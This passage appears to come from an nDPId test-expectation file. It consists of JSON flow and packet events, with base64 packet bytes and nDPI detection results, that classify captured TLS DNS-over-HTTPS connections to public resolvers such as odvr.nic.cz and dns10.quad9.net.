vLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtY
YMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="} +01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="} 
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8
eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEf
wzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} +00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+
r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCII